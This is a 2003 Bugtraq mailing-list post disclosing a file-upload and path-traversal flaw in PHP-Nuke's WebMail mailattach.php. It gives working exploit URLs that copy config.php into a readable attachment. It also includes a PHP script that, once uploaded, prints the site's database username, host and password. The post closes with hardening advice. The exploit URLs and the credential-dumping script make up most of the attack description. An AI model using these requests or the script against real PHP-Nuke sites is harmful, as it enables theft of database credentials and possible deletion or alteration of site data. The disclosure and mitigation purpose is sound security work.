Bugtraq mailing list archives

PHP-Nuke : config.php reveled with php uploaded file.(Affect all uploads implementations in phpnuke).SECURING PHP-NUKE.

From: Lorenzo Hernandez Garcia-Hierro <webmaster () lorenzohgh com>
Date: 1 Mar 2003 12:39:08 -0000



Hello again friends,

Proving in my sites www.novappc.com , i discovered that the PHP-nuke code 
injection for write the content of config.php in a file have more 
vulnerabilities than one ,i explain it:

PROBLEM:

Webmail module is an unsafely mail system , but not all the package, only 
the little file called mailattach.php , the first vulnerability 
discovered is this:

http://NUKESITE/modules/WebMail/mailattach.php?%
20userfile=../../config.php&userfile_name=../attachments/file.txt&attachme
nts=1

(It enables that the attacker writes all the content og config.php , 
passwords and users , in a file file.txt)


THE NEW VULNERABILITY:

I discovered it proving the other old , 

CODE:
http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP 
FILE ]&userfile_name=../attachments/h4ckz.php&attachments=1

DESCRIPTION:

[DIR TO PHP FILE]:

This is the directory of your php file that prints the content of the 
variables 
in config.php , the code of the file is:

<?php
include ("../../config.php")
echo 'DB User:',"$dbuname";
echo '<br><br>';
echo 'Host for Fuck:',"$dbhost";
echo '<br><br>';
echo 'Password:',"$dbpass";
echo '<br><br>';
echo 'Thats all folks my little fucker';
?>

This file load variables from config.php to the h4ckz.php file end prints 
all content of the variables using echo function of php.

You only must access the temporal file in the server in the directory 
that you put in the &userfile_name of the xploit url.

WHAT CAN BE HAPPEN?

All the passwords of config.php are given , the attacker can be use it 
for modify, rename or DELETE the database depending of the privileges and 
the situation of the web admin tool , like phpnuke and the access 
configuration of database , acept tcp/ip connects or not accept.

ONLY AFFECT WEBMAIL?

No, all the modules that upload files can be unsafely because you can 
modify the variables of the xploit url to run with other module that 
upload files.

SOLUTION (SECURING PHP-NUKE):

FIRST: Modify code of all the files that upload files of course for die 
when the file is called remotely ( QUERY_STRING remote and REFERER 
remote) , you an find more info about this in the modules.php file.
SECOND: Be sure (optional) that the php-nuke not use a root user for 
database.
THIRT: Modify mysql/postgre/etc config for only accept connects of 
localhost and the web admin apps. like php admin ( on remote servers ) 
cant run with your server ;-) 
FOURTH: Activate only the modules that you use, Xd.

CONTACT:
EMAIL: admin () novappc com
WEBSITE: novappc.com novappc.mine.nu
NAME: LORENZO MANUEL HERNANDEZ GARCIA-HIERRO

Current thread:

PHP-Nuke : config.php reveled with php uploaded file.(Affect all uploads implementations in phpnuke).SECURING PHP-NUKE. Lorenzo Hernandez Garcia-Hierro (Mar 02)